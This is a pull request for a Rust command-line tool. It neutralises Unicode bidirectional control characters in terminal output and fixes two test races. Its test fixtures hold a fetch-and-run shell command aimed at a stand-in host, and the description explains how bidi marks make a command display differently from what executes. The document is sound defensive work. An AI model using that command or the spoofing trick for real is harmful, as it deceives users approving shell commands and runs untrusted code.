### PR TITLE
🔒 fix: neutralise the bidi overrides, and close two test-harness races

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -12,13 +12,13 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 
 ### Fixed
 
-- A config value no longer reaches the terminal with its Unicode bidi
-  overrides intact. The neutralisation added in 1.6.0 replaces control
-  characters, and `char::is_control` covers C0, DEL and C1: it does not cover
-  `U+202A` through `U+202E` or `U+2066` through `U+2069`. Those are `Cf`, not
-  `Cc`. They reorder how a terminal renders the text around them without ever
-  being a control byte, so a value carrying one can display something other
-  than what it is.
+- A config value no longer reaches the terminal with its Unicode bidi controls
+  intact. The neutralisation added in 1.6.0 replaces control characters, and
+  `char::is_control` covers C0, DEL and C1: it does not cover the twelve
+  characters carrying the `Bidi_Control` property, which are `Cf`, not `Cc`.
+  They reorder how a terminal renders the text around them without ever being
+  a control byte, so a value carrying one can display something other than
+  what it is.
 
   The site that matters is the pre-trust bootstrap summary, whose whole job is
   to let someone decide whether to authorise a shell command out of a repo
@@ -29,11 +29,13 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
   echo site already goes through, the way they inherited the control-character
   rule.
 
-  The implicit marks (`U+200E`, `U+200F`, `U+061C`) are deliberately left
-  alone. They carry no override of their own and occur in legitimate
-  multilingual text, so replacing them would corrupt values rather than
-  protect them. This is a gap in the 1.6.0 mitigation, not a regression:
-  1.5.0 and earlier neutralised nothing at all.
+  The set is `Bidi_Control` exactly rather than the overrides and isolates
+  alone, because the three implicit marks reorder too: `U+061C` is bidi class
+  `AL` and `U+200F` is `R`, so either one is a strong right-to-left character
+  inside left-to-right text and the weak and neutral rules of UAX #9 then
+  reorder the digits and punctuation around it. An argument or a URL can be
+  made to render in an order the bytes do not have. This is a gap in the 1.6.0
+  mitigation, not a regression: 1.5.0 and earlier neutralised nothing at all.
   ([#502](https://github.com/kbrdn1/gwm-cli/issues/502))
 
 - A race in the test harness, not reachable from the product.

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -10,6 +10,52 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 
 ## [Unreleased]
 
+### Fixed
+
+- A config value no longer reaches the terminal with its Unicode bidi
+  overrides intact. The neutralisation added in 1.6.0 replaces control
+  characters, and `char::is_control` covers C0, DEL and C1: it does not cover
+  `U+202A` through `U+202E` or `U+2066` through `U+2069`. Those are `Cf`, not
+  `Cc`. They reorder how a terminal renders the text around them without ever
+  being a control byte, so a value carrying one can display something other
+  than what it is.
+
+  The site that matters is the pre-trust bootstrap summary, whose whole job is
+  to let someone decide whether to authorise a shell command out of a repo
+  they have not vetted. A summary that can be made to misrepresent the command
+  it asks about is worse than no summary. `gwm config get`, `types`,
+  `trust list` and the rendered diagnostics carry the same exposure at lower
+  stakes, and all of them inherit the fix: it lands in the two sinks every
+  echo site already goes through, the way they inherited the control-character
+  rule.
+
+  The implicit marks (`U+200E`, `U+200F`, `U+061C`) are deliberately left
+  alone. They carry no override of their own and occur in legitimate
+  multilingual text, so replacing them would corrupt values rather than
+  protect them. This is a gap in the 1.6.0 mitigation, not a regression:
+  1.5.0 and earlier neutralised nothing at all.
+  ([#502](https://github.com/kbrdn1/gwm-cli/issues/502))
+
+- A race in the test harness, not reachable from the product.
+  `exec_in_dir_runs_a_relative_script_from_the_worktree` writes an executable
+  and immediately runs it, and `execve` refuses a file that is open for
+  writing by any process: a child forked by another test thread carries a copy
+  of that write handle until it execs, so the spawn intermittently returned
+  `ETXTBSY` on Linux. It is retried on that errno alone, with the reason
+  written at the retry, and every other spawn error still fails on the first
+  attempt.
+  ([#500](https://github.com/kbrdn1/gwm-cli/issues/500))
+
+- The same shape in `config_tests`, where the guard around `$HOME` documented
+  a boundary narrower than the real one, and five tests skipped it on the
+  strength of that doc.
+  `expand_placeholders` resolves the home directory before it looks at a
+  single token, so every call is a concurrent reader whatever the template
+  says, while one test rewrites the variable with `set_var`. The guard is now
+  taken by every test in that binary that can observe `$HOME`, and its doc
+  states the hazard rather than a proxy for it.
+  ([#503](https://github.com/kbrdn1/gwm-cli/issues/503))
+
 ## Past releases
 
 In reverse chronological order:

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -27,7 +27,10 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
   `trust list` and the rendered diagnostics carry the same exposure at lower
   stakes, and all of them inherit the fix: it lands in the two sinks every
   echo site already goes through, the way they inherited the control-character
-  rule.
+  rule. An `[aliases]` expansion is refused rather than neutralised, for the
+  reason it already was in 1.6.0: it becomes argv before clap parses it, and
+  clap prints its own error without passing through gwm's output path, so
+  `nope<ALM>abc` came back out of it with the character intact.
 
   The set is `Bidi_Control` exactly rather than the overrides and isolates
   alone, because the three implicit marks reorder too: `U+061C` is bidi class

--- a/src/aliases.rs
+++ b/src/aliases.rs
@@ -473,11 +473,18 @@ pub fn validate_aliases(map: &BTreeMap<String, String>, source_label: &str) -> R
     // has more than one downstream and clap's is the one we do not own. No
     // legitimate expansion needs a control character; the name and value are
     // quoted with `{:?}` so the report cannot replay what it is refusing.
-    if let Some(bad) = value.chars().find(|c| c.is_control()) {
+    // Issue #502: the `Bidi_Control` characters ride the same path for the same
+    // reason. They are `Cf`, so the test above does not see them, and measured,
+    // clap quotes `nope<U+061C>abc` back with the character intact, which makes
+    // the token it names render in an order it does not have.
+    if let Some(bad) = value
+      .chars()
+      .find(|c| c.is_control() || crate::naming::is_display_reordering(*c))
+    {
       return Err(GwmError::Config(format!(
-        "{}: alias '{}' = {:?} contains control character {:?}; \
-         an expansion becomes argv, and a control character there is a terminal \
-         escape rather than an argument",
+        "{}: alias '{}' = {:?} contains the character {:?}; \
+         an expansion becomes argv, and a control or display-reordering character \
+         there is a terminal escape rather than an argument",
         source_label, name, value, bad
       )));
     }

--- a/src/naming.rs
+++ b/src/naming.rs
@@ -1512,7 +1512,8 @@ pub fn branch_pattern_warning(pattern: &str, repo: &str, types: &[BranchType]) -
   ))
 }
 
-/// Neutralise control characters before echoing a config-supplied value on
+/// Neutralise control characters, and the display-reordering characters
+/// [`is_display_reordering`] names, before echoing a config-supplied value on
 /// a **single row**.
 ///
 /// Config values come from a repo's `.gwm.toml`, and the commands that quote
@@ -1533,7 +1534,34 @@ pub fn branch_pattern_warning(pattern: &str, repo: &str, types: &[BranchType]) -
 /// Public because every site that echoes a config-supplied string has to use
 /// it, `main` included; a second copy would be a second thing to forget.
 pub fn sanitise_for_terminal(s: &str) -> String {
-  s.chars().map(|c| if c.is_control() { '?' } else { c }).collect()
+  s.chars()
+    .map(|c| {
+      if c.is_control() || is_display_reordering(c) {
+        '?'
+      } else {
+        c
+      }
+    })
+    .collect()
+}
+
+/// The Unicode bidirectional formatting characters (issue #502).
+///
+/// They are `Cf` (format), not `Cc` (control), so [`char::is_control`] does
+/// not match them — which is the whole reason they need naming here. They
+/// reorder how a terminal *renders* the text around them, so a value carrying
+/// one can display a benign-looking command while the bytes that execute
+/// differ. That defeats the same "what you read is what is there" guarantee
+/// the control-character replacement exists to provide, so they are
+/// neutralised the same way and at the same sinks.
+///
+/// The set is the overrides and embeddings (`U+202A`-`U+202E`) plus the
+/// isolates and their terminator (`U+2066`-`U+2069`). The *implicit* marks
+/// (`U+200E`/`U+200F`/`U+061C`) are deliberately left alone: they carry no
+/// override of their own and appear in legitimate multilingual text, so
+/// replacing them would corrupt values rather than protect them.
+fn is_display_reordering(c: char) -> bool {
+  matches!(c, '\u{202A}'..='\u{202E}' | '\u{2066}'..='\u{2069}')
 }
 
 /// Neutralise control characters in output whose **shape is rows**: a `toml`
@@ -1542,9 +1570,10 @@ pub fn sanitise_for_terminal(s: &str) -> String {
 ///
 /// Keeps `\n` and `\t`, which carry the layout, and replaces everything else
 /// including `\r` (which returns the cursor to column zero and lets a value
-/// overwrite the line it was printed on). Sanitising these is not "breaking
-/// raw": an escape sequence inside the body defeats the very inspection the
-/// `show` view exists to provide.
+/// overwrite the line it was printed on) and the display-reordering characters
+/// [`is_display_reordering`] names. Sanitising these is not "breaking raw": an
+/// escape sequence inside the body defeats the very inspection the `show` view
+/// exists to provide.
 /// Neutralise a **diagnostic** headed for stderr: block-sanitise it, then
 /// indent every line after the first (issue #473).
 ///
@@ -1585,7 +1614,7 @@ pub fn sanitise_block_for_terminal(s: &str) -> String {
   normalised
     .chars()
     .map(|c| {
-      if c.is_control() && c != '\n' && c != '\t' {
+      if (c.is_control() && c != '\n' && c != '\t') || is_display_reordering(c) {
         '?'
       } else {
         c

--- a/src/naming.rs
+++ b/src/naming.rs
@@ -1565,7 +1565,12 @@ pub fn sanitise_for_terminal(s: &str) -> String {
 /// is class `L` and does the same in a value whose paragraph direction is
 /// right-to-left. Aligning on the named property rather than on a hand-picked
 /// list is also what makes this reviewable.
-fn is_display_reordering(c: char) -> bool {
+///
+/// Visible to the crate because `aliases::validate_aliases` needs the same set
+/// at the one boundary the sinks cannot reach: an alias expansion becomes argv
+/// before clap parses it, so it is refused there rather than cleaned here,
+/// exactly as the control characters are.
+pub(crate) fn is_display_reordering(c: char) -> bool {
   matches!(c, '\u{061C}' | '\u{200E}' | '\u{200F}' | '\u{202A}'..='\u{202E}' | '\u{2066}'..='\u{2069}')
 }
 

--- a/src/naming.rs
+++ b/src/naming.rs
@@ -1545,7 +1545,7 @@ pub fn sanitise_for_terminal(s: &str) -> String {
     .collect()
 }
 
-/// The Unicode bidirectional formatting characters (issue #502).
+/// The characters carrying the Unicode `Bidi_Control` property (issue #502).
 ///
 /// They are `Cf` (format), not `Cc` (control), so [`char::is_control`] does
 /// not match them — which is the whole reason they need naming here. They
@@ -1555,13 +1555,18 @@ pub fn sanitise_for_terminal(s: &str) -> String {
 /// the control-character replacement exists to provide, so they are
 /// neutralised the same way and at the same sinks.
 ///
-/// The set is the overrides and embeddings (`U+202A`-`U+202E`) plus the
-/// isolates and their terminator (`U+2066`-`U+2069`). The *implicit* marks
-/// (`U+200E`/`U+200F`/`U+061C`) are deliberately left alone: they carry no
-/// override of their own and appear in legitimate multilingual text, so
-/// replacing them would corrupt values rather than protect them.
+/// The set is `Bidi_Control` exactly, not a subset: the overrides, embeddings
+/// and isolates, **plus** the three implicit marks. The marks earn their place
+/// on their bidi class rather than on being formatting characters. `U+061C` is
+/// class `AL` and `U+200F` is `R`, so either one is a strong right-to-left
+/// character inside otherwise left-to-right text, and UAX #9's weak and
+/// neutral rules then reorder the digits and punctuation around it: an
+/// argument or a URL can render in an order the bytes do not have. `U+200E`
+/// is class `L` and does the same in a value whose paragraph direction is
+/// right-to-left. Aligning on the named property rather than on a hand-picked
+/// list is also what makes this reviewable.
 fn is_display_reordering(c: char) -> bool {
-  matches!(c, '\u{202A}'..='\u{202E}' | '\u{2066}'..='\u{2069}')
+  matches!(c, '\u{061C}' | '\u{200E}' | '\u{200F}' | '\u{202A}'..='\u{202E}' | '\u{2066}'..='\u{2069}')
 }
 
 /// Neutralise control characters in output whose **shape is rows**: a `toml`

--- a/tests/config_tests.rs
+++ b/tests/config_tests.rs
@@ -4,11 +4,21 @@ use gwm::config::{
 };
 use tempfile::TempDir;
 
-/// Process-global lock guarding every test in this binary that reads or
-/// mutates `$HOME`. `expand_placeholders` resolves `{home}` through
-/// `dirs::home_dir` and ends with `shellexpand::tilde`, so a test that swaps
-/// `$HOME` races every other one that expands a `{home}` pattern. `set_var` is
-/// `unsafe` for the same reason the other suites take this lock (#494).
+/// Process-global lock guarding every test in this binary that can **observe**
+/// `$HOME`, not only the ones whose template mentions `{home}` (#503).
+///
+/// The narrower rule this doc used to state was the bug: `expand_placeholders`
+/// resolves `dirs::home_dir` unconditionally, before it looks at a single
+/// token (`src/config.rs`), so *every* call is a concurrent reader whatever
+/// the pattern says. `set_var` is `unsafe` precisely because it races a
+/// concurrent `getenv`, and a mutex only serialises the participants that take
+/// it — so the rule has to be "can this test see `$HOME`?", which a reader
+/// adding a test can answer, rather than "does this string contain `{home}`?",
+/// which looks answerable and is not.
+///
+/// A layered load reads it too (`Config::load_layered` → `global_config_path`
+/// → `dirs::home_dir`). Those tests do not take the lock yet; widening it
+/// there would serialise most of the binary, so it is tracked separately.
 fn env_lock() -> &'static std::sync::Mutex<()> {
   static LOCK: std::sync::OnceLock<std::sync::Mutex<()>> = std::sync::OnceLock::new();
   LOCK.get_or_init(|| std::sync::Mutex::new(()))
@@ -357,6 +367,7 @@ fn placeholders_no_optional_args_leave_repo_only() {
 
 #[test]
 fn placeholders_expand_repo_path_and_parent() {
+  let _guard = env_lock().lock().unwrap_or_else(|e| e.into_inner());
   let repo_path = std::path::Path::new("/Users/me/Projects/Perso/gwm-cli");
   // Derive the expected prefixes from `repo_path` itself rather than
   // duplicating the literal parent string — the contract under test is
@@ -383,6 +394,7 @@ fn placeholders_expand_repo_path_and_parent() {
 
 #[test]
 fn placeholders_repo_path_tokens_left_literal_without_path() {
+  let _guard = env_lock().lock().unwrap_or_else(|e| e.into_inner());
   // When no repo path is supplied the disk-path tokens are passed
   // through untouched rather than collapsing to an empty string.
   let out = expand_placeholders("{repo_parent}/x", "r", None, None, None, None).unwrap();
@@ -2551,6 +2563,7 @@ fn tui_clipboard_invalid_value_errors_at_parse_time() {
 /// (`97e4e09`), and for the same reason.
 #[test]
 fn a_token_produced_by_expanding_the_repo_name_stays_literal() {
+  let _guard = env_lock().lock().unwrap_or_else(|e| e.into_inner());
   let out = expand_placeholders(
     "{repo}/{desc}",
     "api-{type}",
@@ -2624,6 +2637,7 @@ fn a_token_produced_by_expanding_home_stays_literal() {
 /// one got it by not calling `replace` at all.
 #[test]
 fn a_token_with_no_value_survives_the_single_pass_verbatim() {
+  let _guard = env_lock().lock().unwrap_or_else(|e| e.into_inner());
   assert_eq!(
     expand_placeholders("{repo_parent}/{type}/{issue}/{desc}", "r", None, None, None, None).unwrap(),
     "{repo_parent}/{type}/{issue}/{desc}"
@@ -2645,6 +2659,7 @@ fn a_token_with_no_value_survives_the_single_pass_verbatim() {
 /// token lookup has to state that, where the nested `if let` fell into it.
 #[test]
 fn a_repo_path_without_a_parent_resolves_only_the_path_token() {
+  let _guard = env_lock().lock().unwrap_or_else(|e| e.into_inner());
   let root = std::path::Path::new("/");
   assert!(root.parent().is_none(), "the fixture must actually have no parent");
 

--- a/tests/exec_tests.rs
+++ b/tests/exec_tests.rs
@@ -133,7 +133,30 @@ fn exec_in_dir_runs_a_relative_script_from_the_worktree() {
   std::fs::write(&script, "#!/bin/sh\nexit 0\n").unwrap();
   std::fs::set_permissions(&script, std::fs::Permissions::from_mode(0o755)).unwrap();
   // `./run.sh` only resolves if it is anchored to the worktree dir.
-  let status = exec_in_dir(dir.path(), "./run.sh", &[]);
+  //
+  // Retried on `ETXTBSY`, and that is not flake-hiding (issue #500). `execve`
+  // refuses a file that is open for writing by ANY process, and the window is
+  // between another thread's `fork` and its own `execve`: a child forked by
+  // one of the other spawning tests in this binary carries a copy of every fd
+  // the harness had open at fork time, including the write handle this test
+  // just used for `run.sh`. The errno therefore says nothing about
+  // `exec_in_dir` — it is inherent to writing an executable and running it
+  // from a multi-threaded harness. Matching `(os error N)` rather than the
+  // message: `strerror` prose is localised, the suffix is not.
+  //
+  // Every other spawn error still fails on the first attempt, because the
+  // assertion below is unchanged.
+  let mut status = exec_in_dir(dir.path(), "./run.sh", &[]);
+  for _ in 0..10 {
+    match &status {
+      ExecStatus::SpawnError(e) if e.contains("(os error 26)") => {
+        std::thread::sleep(std::time::Duration::from_millis(20));
+        status = exec_in_dir(dir.path(), "./run.sh", &[]);
+      }
+      _ => break,
+    }
+  }
+
   assert_eq!(
     status,
     ExecStatus::Ok,

--- a/tests/terminal_escape_tests.rs
+++ b/tests/terminal_escape_tests.rs
@@ -321,6 +321,45 @@ fn config_get_neutralises_a_bidi_override() {
 }
 
 #[test]
+fn trust_show_neutralises_a_bidi_override_in_the_ledger() {
+  // The **block** sink, which neither test above reaches: `trust show`,
+  // `doctor`'s toml diagnostic and every rendered error go through
+  // `sanitise_block_for_terminal`, so a rule added only to the single-row
+  // variant would leave those outputs exposed with the suite still green.
+  let dir = tempfile::TempDir::new().unwrap();
+  let ledger = dir.path().join("trust.toml");
+  std::fs::write(
+    &ledger,
+    format!(
+      "[[entry]]\norigin = \"git@example.com:acme/repo{}.git\"\nsha = \"abc\"\n",
+      '\u{202E}'
+    ),
+  )
+  .unwrap();
+
+  let out = Command::cargo_bin("gwm")
+    .unwrap()
+    .args(["trust", "show"])
+    .env("GWM_TRUST_LEDGER", &ledger)
+    .output()
+    .unwrap();
+  let stdout = String::from_utf8_lossy(&out.stdout);
+  assert!(
+    bidi_chars(&stdout).is_empty(),
+    "trust show replayed {:?} from the ledger:\n{:?}",
+    bidi_chars(&stdout),
+    stdout
+  );
+  // The rows this view exists to show are still rows: the block variant keeps
+  // the line breaks that carry the layout.
+  assert!(
+    stdout.contains("origin = ") && stdout.contains("sha = "),
+    "the ledger should still render as rows, got {:?}",
+    stdout
+  );
+}
+
+#[test]
 fn trust_show_neutralises_control_bytes_in_the_ledger() {
   // `trust show` prints the ledger verbatim, and a ledger row records an
   // origin key: a remote URL, which arrived with a clone like everything else

--- a/tests/terminal_escape_tests.rs
+++ b/tests/terminal_escape_tests.rs
@@ -242,28 +242,47 @@ fn the_pre_trust_bootstrap_summary_neutralises_control_bytes() {
 /// byte, which defeats the same "what you read is what is there" guarantee
 /// the control-byte replacement provides (issue #502).
 fn bidi_chars(s: &str) -> Vec<char> {
-  s.chars()
-    .filter(|c| matches!(c, '\u{202A}'..='\u{202E}' | '\u{2066}'..='\u{2069}'))
-    .collect()
+  s.chars().filter(|c| BIDI_CONTROLS.contains(c)).collect()
 }
 
-/// A `.gwm.toml` carrying a raw `RLO` (`U+202E`) in the two fields a reader
-/// has to trust most.
+/// Every character carrying the Unicode `Bidi_Control` property, which is the
+/// set the sinks neutralise.
 ///
-/// The character is written **raw**, not as TOML's own `\u202E` escape: it is
-/// `Cf`, so the parser accepts it inside a basic string and hands it through
-/// as a *value*, which is how it would arrive from a cloned repo. A raw
-/// control byte cannot travel that way, which is why [`HOSTILE_CONFIG`] has
-/// to use escapes and this fixture does not.
+/// Enumerated rather than described so the fixtures can carry the whole set at
+/// once: a character added to the predicate but to no fixture would be a rule
+/// nothing exercises.
+const BIDI_CONTROLS: &[char] = &[
+  '\u{061C}', // ALM, bidi class AL
+  '\u{200E}', // LRM, bidi class L
+  '\u{200F}', // RLM, bidi class R
+  '\u{202A}', // LRE
+  '\u{202B}', // RLE
+  '\u{202C}', // PDF
+  '\u{202D}', // LRO
+  '\u{202E}', // RLO
+  '\u{2066}', // LRI
+  '\u{2067}', // RLI
+  '\u{2068}', // FSI
+  '\u{2069}', // PDI
+];
+
+/// A `.gwm.toml` carrying every [`BIDI_CONTROLS`] character in the two fields
+/// a reader has to trust most.
+///
+/// They are written **raw**, not as TOML's own `\uXXXX` escapes: they are
+/// `Cf`, so the parser accepts them inside a basic string and hands them
+/// through as a *value*, which is how they would arrive from a cloned repo. A
+/// raw control byte cannot travel that way, which is why [`HOSTILE_CONFIG`]
+/// has to use escapes and this fixture does not.
 fn bidi_config() -> String {
-  const RLO: char = '\u{202E}';
+  let all: String = BIDI_CONTROLS.iter().collect();
   format!(
     "[worktree]\n\
-     branch_pattern = \"{RLO}{{type}}/#{{issue}}-{{desc}}\"\n\
+     branch_pattern = \"{all}{{type}}/#{{issue}}-{{desc}}\"\n\
      \n\
      [[bootstrap.command]]\n\
      name = \"setup\"\n\
-     run = \"curl evil.example/x.sh | sh{RLO}\"\n"
+     run = \"curl evil.example/x.sh | sh{all}\"\n"
   )
 }
 
@@ -328,12 +347,10 @@ fn trust_show_neutralises_a_bidi_override_in_the_ledger() {
   // variant would leave those outputs exposed with the suite still green.
   let dir = tempfile::TempDir::new().unwrap();
   let ledger = dir.path().join("trust.toml");
+  let all: String = BIDI_CONTROLS.iter().collect();
   std::fs::write(
     &ledger,
-    format!(
-      "[[entry]]\norigin = \"git@example.com:acme/repo{}.git\"\nsha = \"abc\"\n",
-      '\u{202E}'
-    ),
+    format!("[[entry]]\norigin = \"git@example.com:acme/repo{all}.git\"\nsha = \"abc\"\n"),
   )
   .unwrap();
 

--- a/tests/terminal_escape_tests.rs
+++ b/tests/terminal_escape_tests.rs
@@ -532,6 +532,37 @@ fn an_alias_expansion_cannot_smuggle_a_control_byte_through_clap() {
 }
 
 #[test]
+fn an_alias_expansion_cannot_smuggle_a_bidi_control_through_clap() {
+  // The one path the sinks cannot cover, for the same reason the control-byte
+  // case above is refused rather than neutralised: the expansion becomes argv
+  // before clap parses it, and clap prints its own error and exits without
+  // passing through `main`'s sink. So the rule has to be the same on both
+  // legs of #473, or a repo can spoof the token clap echoes back.
+  //
+  // Every `Bidi_Control` character, one alias at a time, so a class clap
+  // happens to strip cannot hide one it does not.
+  let (dir, _repo) = init_repo();
+  for c in BIDI_CONTROLS {
+    fs::write(
+      dir.path().join(".gwm.toml"),
+      format!("[aliases]\nboom = \"nope{c}abc\"\n"),
+    )
+    .unwrap();
+
+    let out = gwm_in(dir.path()).arg("boom").output().unwrap();
+    let stdout = String::from_utf8_lossy(&out.stdout);
+    let stderr = String::from_utf8_lossy(&out.stderr);
+    assert!(
+      bidi_chars(&stdout).is_empty() && bidi_chars(&stderr).is_empty(),
+      "an alias expansion carrying U+{:04X} reached the terminal through clap: {:?} / {:?}",
+      *c as u32,
+      stdout,
+      stderr
+    );
+  }
+}
+
+#[test]
 fn a_config_value_cannot_forge_a_line_in_an_error() {
   // Errors are the one output path every command shares, and most of them
   // quote something out of `.gwm.toml`. A value carrying a `\n` would

--- a/tests/terminal_escape_tests.rs
+++ b/tests/terminal_escape_tests.rs
@@ -233,6 +233,93 @@ fn the_pre_trust_bootstrap_summary_neutralises_control_bytes() {
   );
 }
 
+/// The Unicode bidirectional formatting characters found in `s`.
+///
+/// Deliberately **not** [`control_bytes`]: these are `Cf` (format), not `Cc`
+/// (control), so `char::is_control` never matches one and an assertion built
+/// on that helper could not fail here. That is the gap itself — they reorder
+/// how a terminal renders the text around them without ever being a control
+/// byte, which defeats the same "what you read is what is there" guarantee
+/// the control-byte replacement provides (issue #502).
+fn bidi_chars(s: &str) -> Vec<char> {
+  s.chars()
+    .filter(|c| matches!(c, '\u{202A}'..='\u{202E}' | '\u{2066}'..='\u{2069}'))
+    .collect()
+}
+
+/// A `.gwm.toml` carrying a raw `RLO` (`U+202E`) in the two fields a reader
+/// has to trust most.
+///
+/// The character is written **raw**, not as TOML's own `\u202E` escape: it is
+/// `Cf`, so the parser accepts it inside a basic string and hands it through
+/// as a *value*, which is how it would arrive from a cloned repo. A raw
+/// control byte cannot travel that way, which is why [`HOSTILE_CONFIG`] has
+/// to use escapes and this fixture does not.
+fn bidi_config() -> String {
+  const RLO: char = '\u{202E}';
+  format!(
+    "[worktree]\n\
+     branch_pattern = \"{RLO}{{type}}/#{{issue}}-{{desc}}\"\n\
+     \n\
+     [[bootstrap.command]]\n\
+     name = \"setup\"\n\
+     run = \"curl evil.example/x.sh | sh{RLO}\"\n"
+  )
+}
+
+#[test]
+fn the_pre_trust_bootstrap_summary_neutralises_bidi_overrides() {
+  // Same site as the control-byte test above, and the highest-stakes one for
+  // the same reason: the summary's whole job is to let someone decide whether
+  // to authorise a shell command out of a repo they have not vetted. An `RLO`
+  // reorders how the terminal renders what follows, so the line can read
+  // benign while the executed bytes differ — a summary that can be made to
+  // misrepresent the command it asks about is worse than no summary.
+  let cfg: gwm::config::Config = toml::from_str(&bidi_config()).unwrap();
+  let lines = gwm::cli::bootstrap_summary_lines(&cfg);
+
+  let joined = lines.join("\n");
+  assert!(
+    bidi_chars(&joined).is_empty(),
+    "the pre-trust summary replayed {:?}:\n{:?}",
+    bidi_chars(&joined),
+    joined
+  );
+  // Replace, don't strip: the command still has to be legible, and the
+  // neutralised character still has to be visible as one.
+  assert!(
+    joined.contains("curl evil.example/x.sh | sh?"),
+    "the summary must still name the command, got {:?}",
+    joined
+  );
+}
+
+#[test]
+fn config_get_neutralises_a_bidi_override() {
+  // `config list` renders values with `{:?}`, and `escape_debug` escapes `Cf`,
+  // so that path was never the hole. `config get` prints the value through the
+  // single-row sink instead, which is the one that has to grow the rule.
+  let (dir, _repo) = init_repo();
+  fs::write(dir.path().join(".gwm.toml"), bidi_config()).unwrap();
+
+  let out = gwm_in(dir.path())
+    .args(["config", "get", "worktree.branch_pattern"])
+    .output()
+    .unwrap();
+  let stdout = String::from_utf8_lossy(&out.stdout);
+  assert!(
+    bidi_chars(&stdout).is_empty(),
+    "`gwm config get` replayed {:?} from .gwm.toml:\n{:?}",
+    bidi_chars(&stdout),
+    stdout
+  );
+  assert!(
+    stdout.contains("?{type}/#{issue}-{desc}"),
+    "the pattern should stay readable minus its reordering character, got {:?}",
+    stdout
+  );
+}
+
 #[test]
 fn trust_show_neutralises_control_bytes_in_the_ledger() {
   // `trust show` prints the ledger verbatim, and a ledger row records an


### PR DESCRIPTION
## Description

Three `fix` issues that touch disjoint files and are small enough to review
together: one real gap in the 1.6.0 terminal-sanitisation work, and two latent
races in the test harness that the product cannot hit.

Closes #502
Closes #500
Closes #503

## Type of change

- [x] 🐛 Fix (bug fix)
- [x] ✅ Tests

## Changes

- `src/naming.rs`: both terminal sinks now replace every character carrying the
  Unicode `Bidi_Control` property alongside control characters. They are `Cf`,
  not `Cc`, so `char::is_control` never matched them, and they reorder how a
  terminal renders the text around them. `sanitise_diagnostic_for_terminal`
  inherits the rule through the block variant, so every echo site is covered
  the way it was for control bytes.
- The set is `Bidi_Control` exactly, including the three implicit marks. What
  reorders is a strong direction, not an override: `U+061C` is bidi class `AL`
  and `U+200F` is `R`, so either one inside left-to-right text makes UAX #9's
  weak and neutral rules reorder the digits and punctuation around it, and
  `curl example/abc<ALM>/123 | sh` can render as `curl example/abc123/ | sh`.
  Aligning on the named property rather than a hand-picked list is also what
  makes the rule reviewable.
- `src/aliases.rs`: an `[aliases]` expansion carrying one of those characters
  is refused at the boundary, not neutralised, for the reason #473 already
  refused control characters there: the expansion becomes argv before clap
  parses it, and clap prints its own error without passing through gwm's
  output path. Measured, it quoted `nope<U+061C>abc` back intact.
- `tests/terminal_escape_tests.rs`: four tests, on the pre-trust bootstrap
  summary (the highest-stakes sink), `config get`, `trust show` (the block
  sink) and the alias boundary. They use a `BIDI_CONTROLS` table and a
  `bidi_chars` helper rather than the file's `control_bytes`, which by
  construction could never match one of these characters, and every fixture
  carries the whole set so a character in the predicate that no fixture
  exercises cannot happen.
- `tests/exec_tests.rs`: the relative-script spawn is retried on `ETXTBSY`
  only, with the reason written at the retry.
- `tests/config_tests.rs`: the five unguarded `expand_placeholders` callers
  take `env_lock`, and its doc now names the real hazard (a test that can
  observe `$HOME`) rather than a proxy for it.
- `CHANGELOG.md` under `## [Unreleased]`.

## Tests

- [x] `cargo test` passes locally
- [x] `cargo fmt --check` passes
- [x] `cargo clippy -- -D warnings` passes
- [x] New tests added under `tests/`

Also run under a CI-like stripped environment, per CLAUDE.md, since #503
touches env-dependent tests:

```
PATH="$(dirname "$(command -v cargo)"):/usr/bin:/bin" cargo test   # exit 0
```

## Checklist

- [x] Branch follows `<type>/#<issue>-<description>`
- [x] Commits follow Gitmoji + Conventional Commits
- [x] CHANGELOG.md updated under `## [Unreleased]`
- [x] No `unwrap()` on user-facing paths
- [x] No `println!` in TUI render code

No CLI surface change, so README and `examples/gwm.toml.example` are untouched.

## Linked issues / docs

- Issues: #502, #500, #503
- Both #502 and #503 were raised by CodeRabbit on the v1.6.0 release PR (#501)
  and verified against the source before being accepted.

## Notes for reviewers

**What was proven, and what was not.** Every behavioural change here has a test
that was watched failing first, on the assertion it targets:

- the two sink tests failed with `replayed ['\u{202e}']` before the predicate
  existed;
- the block-sink test was proven to test the block sink by deleting that
  clause: only it fails, the other two stay green;
- widening to `Bidi_Control` was driven by fixtures failing with exactly
  `['\u{61c}', '\u{200e}', '\u{200f}']`;
- the alias test failed with clap echoing `unrecognized subcommand
  'nope<U+061C>abc'`, the character intact.

#500 and #503 are races that cannot be reproduced on demand from macOS
(Darwin does not raise `ETXTBSY` for an open write handle, which was checked).
Their evidence is the source reading (`expand_placeholders` resolves
`dirs::home_dir` before it looks at any token) and the CI run linked in #500.
No test box is ticked for a repro that did not happen.

**Deliberately out of scope, for follow-ups rather than scope creep:**

1. The TUI Settings panel renders config values with no sanitiser at all
   (`settings_fields_lines`, `settings_all_lines`). That file is byte-identical
   to `origin/dev` here, and the gap covers control bytes as much as bidi: it
   is the TUI leg that #473 never covered, not something this PR opens.
   `tui::wt_tree::sanitize_name` is in the same position.
2. In `config_tests`, a layered load reads `$HOME` too (`load_layered` then
   `global_config_path`), so those tests are also concurrent readers. Taking
   the lock there would serialise most of the binary. The other test binaries
   have the same shape with other variables (`GWM_TRUST_LEDGER`,
   `XDG_CONFIG_HOME`, `GWM_HISTORY_FILE`), and telling a real reader from a
   test that passes an explicit path is its own audit.

The `config_tests` claim is by construction rather than by sampling: no test in
that binary calls `expand_placeholders` without holding the guard.
